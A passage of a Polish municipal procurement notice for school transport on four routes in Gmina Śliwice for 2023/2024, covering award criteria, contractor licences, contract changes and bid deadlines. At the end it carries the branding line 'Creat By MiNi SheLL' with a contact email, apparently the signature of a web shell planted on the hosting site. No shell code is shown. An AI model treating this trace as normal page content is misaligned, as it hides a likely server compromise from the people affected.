Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A+B<br/>2. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie dowożenia uczniów do szkół i przedszkola na terenie Gminy Śliwice w roku szkolnym 2023/2024 (trasa nr I-IV).<br/>2.	Zestawienie tras wraz z ilością kilometrów, liczbą przejazdów i liczą dzieci zawiera Załącznik nr 6 do SWZ Zestawienie tras dowozu uczniów w roku szkolnym 2023/2024.<br/>3.	Przedmiot zamówienia został podzielony na 4 części (trasy). <br/>-	Część I – trasa I - Śliwice-Zwierzyniec-Okoniny-Główka-Lińsk Wybudowania – Śliwice<br/>-	Część II – trasa II - Śliwice-Łąski Piec-Zazdrość-Laski-Śliwiczki-Śliwice oraz Śliwiczki-Laski-Zazdrość-Łąski Piec-Śliwiczki<br/>-	Część III – trasa III - Lińsk-Okoniny Nadjeziorne (ośrodki)-Okoniny Nadjeziorne (sklep)-Brzozowe Błota-Kamionka-Lisiny-Jabłonka-Lińsk<br/>-	Część IV – trasa IV - Śliwice Śliwice – Okoniny Nadjeziorne (ośrodki)-Okoniny Nadj. (sklep) -Śliwice.<br/>4.	Przewozy uczniów odbywać się mogą wyłącznie pojazdami samochodowymi (zwanymi dalej pojazdami) spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym (t.j. Dz.U. 2023 poz. 047) i innych przepisach związanych z przewozem osób, ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2022r. poz. 2201).<br/>5.	W ramach realizacji zamówienia Wykonawca jest zobowiązany:<br/>-	posiadać wszystkie niezbędne zezwolenia i licencje itp., <br/>-	posiadać ubezpieczenie pojazdów i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem,<br/>-	zapewnić opiekę nad dowożonymi uczniami,<br/>-	dysponować sprawnym technicznie pojazdem służącym do przewozu osób,<br/>-	zapewnić pojazd zastępczy w przypadku awarii i innych przypadków wykluczających dowożenie dzieci dotychczasowym pojazdem,<br/>-	oznaczyć pojazd w taki sposób, aby zawierał informacje, że służy do przewozu uczniów, <br/>-	zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, <br/>-	dysponować pojazdami o wystarczającą liczbie miejsc siedzących dla określonej trasy zgodnie z załącznikiem nr 6 lub posiadać taką ilość pojazdów, aby dowieźć wszystkich uczniów na danej trasie, <br/>-	dysponować odpowiednią liczbą kierowców do realizacji zadania posiadających wymagane uprawnienia,<br/>-	ponosić wszystkie koszty związane z eksploatacją i używaniem pojazdów oraz realizacją zamówienia. <br/>6.	Szczegółowy plan dowozów oraz ewentualne zmiany Wykonawca jest zobowiązany uzgodnić z właściwym dyrektorem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. Cena 60%<br/>B. Termin płatności faktury 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100.<br/>A. Kryterium ceny – maksymalna liczba punktów 60 - zastosowanie będzie miał następujący wzór,<br/>wykorzystywany przy ocenie oferty:<br/>Najniższa cena ofertowa<br/>A = --------------------------------------------- x 100 x 60%<br/>Cena obliczanej oferty<br/>B. Kryterium okres gwarancji jakości - maksymalna liczba punktów 40 - zastosowanie będzie miał<br/>następujący wzór, wykorzystywany przy ocenie oferty:<br/>Termin płatności badanej oferty<br/>B = --------------------------------------------------- x 100 x 40%<br/>Najdłuższy termin płatności<br/>2. W formularzu ofertowym wykonawca wskaże termin płatności faktury nie krótszy niż 7 dni i nie dłuższy niż 30 dni.<br/>1. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A+B<br/>2. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie dowożenia uczniów do szkół i przedszkola na terenie Gminy Śliwice w roku szkolnym 2023/2024 (trasa nr I-IV).<br/>2.	Zestawienie tras wraz z ilością kilometrów, liczbą przejazdów i liczą dzieci zawiera Załącznik nr 6 do SWZ Zestawienie tras dowozu uczniów w roku szkolnym 2023/2024.<br/>3.	Przedmiot zamówienia został podzielony na 4 części (trasy). <br/>-	Część I – trasa I - Śliwice-Zwierzyniec-Okoniny-Główka-Lińsk Wybudowania – Śliwice<br/>-	Część II – trasa II - Śliwice-Łąski Piec-Zazdrość-Laski-Śliwiczki-Śliwice oraz Śliwiczki-Laski-Zazdrość-Łąski Piec-Śliwiczki<br/>-	Część III – trasa III - Lińsk-Okoniny Nadjeziorne (ośrodki)-Okoniny Nadjeziorne (sklep)-Brzozowe Błota-Kamionka-Lisiny-Jabłonka-Lińsk<br/>-	Część IV – trasa IV - Śliwice Śliwice – Okoniny Nadjeziorne (ośrodki)-Okoniny Nadj. (sklep) -Śliwice.<br/>4.	Przewozy uczniów odbywać się mogą wyłącznie pojazdami samochodowymi (zwanymi dalej pojazdami) spełniającymi wymagania techniczne określone w przepisach ustawy - Prawo o ruchu drogowym (t.j. Dz.U. 2023 poz. 047) i innych przepisach związanych z przewozem osób, ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz.U. 2022r. poz. 2201).<br/>5.	W ramach realizacji zamówienia Wykonawca jest zobowiązany:<br/>-	posiadać wszystkie niezbędne zezwolenia i licencje itp., <br/>-	posiadać ubezpieczenie pojazdów i pasażerów od wszelkich szkód powstałych podczas przewozu i pozostających w związku z przewozem,<br/>-	zapewnić opiekę nad dowożonymi uczniami,<br/>-	dysponować sprawnym technicznie pojazdem służącym do przewozu osób,<br/>-	zapewnić pojazd zastępczy w przypadku awarii i innych przypadków wykluczających dowożenie dzieci dotychczasowym pojazdem,<br/>-	oznaczyć pojazd w taki sposób, aby zawierał informacje, że służy do przewozu uczniów, <br/>-	zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, <br/>-	dysponować pojazdami o wystarczającą liczbie miejsc siedzących dla określonej trasy zgodnie z załącznikiem nr 6 lub posiadać taką ilość pojazdów, aby dowieźć wszystkich uczniów na danej trasie, <br/>-	dysponować odpowiednią liczbą kierowców do realizacji zadania posiadających wymagane uprawnienia,<br/>-	ponosić wszystkie koszty związane z eksploatacją i używaniem pojazdów oraz realizacją zamówienia. <br/>6.	Szczegółowy plan dowozów oraz ewentualne zmiany Wykonawca jest zobowiązany uzgodnić z właściwym dyrektorem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. Cena 60%<br/>B. Termin płatności faktury 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100.<br/>A. Kryterium ceny – maksymalna liczba punktów 60 - zastosowanie będzie miał następujący wzór,<br/>wykorzystywany przy ocenie oferty:<br/>Najniższa cena ofertowa<br/>A = --------------------------------------------- x 100 x 60%<br/>Cena obliczanej oferty<br/>B. Kryterium okres gwarancji jakości - maksymalna liczba punktów 40 - zastosowanie będzie miał<br/>następujący wzór, wykorzystywany przy ocenie oferty:<br/>Termin płatności badanej oferty<br/>B = --------------------------------------------------- x 100 x 40%<br/>Najdłuższy termin płatności<br/>2. W formularzu ofertowym wykonawca wskaże termin płatności faktury nie krótszy niż 7 dni i nie dłuższy niż 30 dni.<br/>1. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A+B<br/>2. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>2.	Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt. 1, Zamawiający wymaga, aby Wykonawca wykazał, że:<br/>1)	posiada ważną licencję na podjęcie i wykonywanie krajowego transportu drogowego w zakresie przewozu osób lub zezwolenie na wykonywanie zawodu przewoźnika w zakresie krajowego przewozu osób wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. 2022 r. poz. 2201);<br/>2)	posiada ważne zezwolenie na wykonywanie regularnych przewozów specjalnych osób w krajowym transporcie drogowym na liniach komunikacyjnych na obszarze gminy, wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2022r. poz. 2201). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu na wezwanie Zamawiającego Wykonawca zobowiązany będzie do złożenia następujących dokumentów:<br/>1)	licencja na podjęcie i wykonywanie krajowego transportu drogowego w zakresie przewozu osób lub zezwolenie na wykonywanie zawodu przewoźnika w zakresie krajowego przewozu osób wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. 2022 r. poz. 2201);<br/>2)	zezwolenia na wykonywanie regularnych przewozów specjalnych osób w krajowym transporcie drogowym na liniach komunikacyjnych na obszarze gminy, wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2022 r. poz. 2201).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego – zgodnie z Załącznikiem Nr 2A do SWZ;<br/>− w przypadku wspólnego ubiegania się o zamówienie przez wielu wykonawców, oświadczenie składa każdy z<br/>wykonawców, oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu;<br/>− w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca przedstawia także<br/>oświadczenie podmiotu udostępniającego zasoby potwierdzającego brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z Załącznikiem Nr 2B do SWZ;<br/>2) dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z odpisu lub<br/>informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru,<br/>3) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego (jeżeli dotyczy);<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy, z którego wynika, które roboty budowlane wykonają<br/>poszczególni wykonawcy - zgodnie z Załącznikiem Nr 3 do SWZ (jeżeli dotyczy),<br/>5) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia (zgodnie z Załącznikiem Nr 4<br/>do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów w przypadku polegania<br/>na zdolnościach innych podmiotów (jeżeli dotyczy).<br/>6) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia ww. dokumentu, jeżeli zamawiający może go uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tego dokumentu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Stosowne pełnomocnictwo należy złożyć wraz z ofertą.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań dotyczących usługi.<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wielu Wykonawców, oświadczenie, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego składa<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w<br/>jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy., jeżeli<br/>Zamawiający<br/>dopuszcza składanie ofert częściowych, jeżeli Zamawiający dopuszcza składanie ofert częściowych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania następujących zmian postanowień umowy w przypadkach, o których mowa w art. 455 ustaw Prawo zamówień publicznych oraz w wypadku wystąpienia następujących okoliczności: <br/>1)	W przypadku zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami lub przepisami prawa, <br/>2)	Zmiany w zakresie przedmiotu zamówienia będących następstwem zdarzeń obiektywnie niezależnych od Zamawiającego lub Wykonawcy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z niniejszej umowy, których Zamawiający lub Wykonawca nie mógł przewidzieć i którym nie mógł zapobiec ani ich przezwyciężyć i im przeciwdziałać, <br/>3)	Zmiany wynikające ze zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy (np. urzędowa stawka podatku VAT), <br/>2.	W przypadku wystąpienia okoliczności wymienionych w § 8 ust. 1 Zamawiający zapłaci wykonawcy wynagrodzenie za faktycznie wykonana usługę. <br/>3.	Wystąpienie którejkolwiek z wymienionych w ust. 1 okoliczności, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian w umowie, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania. <br/>4.	Zamawiający przewiduje możliwość waloryzacji wynagrodzenia, o której mowa w art.<br/>439 ust. 1 Prawa zamówień publicznych, tj. w przypadku zmiany ceny materiałów lub<br/>kosztów związanych z realizacją zamówienia z zastosowaniem następujących zasad.<br/>1) Waloryzacja będzie się odbywać w oparciu o wskaźnik cen towarów i usług<br/>konsumpcyjnych ogółem publikowany przez Prezesa Głównego Urzędu Statystycznego<br/>(dalej: „wskaźnik GUS”).<br/>2) Zmiana wynagrodzenia dokonuje się w przypadku, gdy skumulowana, procentowa zmiana<br/>(wzrost lub obniżenie) wskaźnika GUS, począwszy od pierwszego, pełnego miesiąca<br/>kalendarzowego od daty zawarcia umowy wynosi, na moment dokonywania waloryzacji,<br/>więcej niż 5 %.<br/>3) Zmiana wynagrodzenia dokonuje się na podstawie wniosku złożonego przez jedną ze<br/>stron umowy nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy. Strona<br/>umowy, żądająca zmiany wielkości wynagrodzenia należnego wykonawcy, przedstawia<br/>drugiej stronie odpowiednio uzasadniony wniosek zawierający dokładny opis<br/>proponowanej zmiany wraz ze szczegółową kalkulacją kosztów oraz zasadami<br/>sporządzenia takiej kalkulacji.<br/>4) Zmiana wynagrodzenia należnego Wykonawcy może nastąpić nie wcześniej niż po<br/>upływie 6 miesięcy od dnia zawarcia umowy. Zamawiający dopuszcza jedną waloryzację.<br/>5) W wyniku dokonania waloryzacji, wynagrodzenie może ulec zwiększeniu lub<br/>zmniejszeniu maksymalnie o 3% łącznej wysokości wynagrodzenia brutto, o którym<br/>mowa w umowie.<br/>6). Waloryzacja dotyczy tylko części zamówienia, która nie została wykonana do dnia<br/>waloryzacji wynagrodzenia.<br/>5.	Zamawiający dopuszcza zmianę terminu realizacji zamówienia przy wystąpieniu istotnych okoliczności po stronie Zamawiającego. <br/>6.	Zamawiający nie dopuszcza zmiany terminu realizacji zamówienia z winy Wykonawcy. <br/>7.	Wszelkie zmiany do umowy wymagają zgody obydwu stron i zawarcia aneksu w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-25 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/sliwice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-25 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com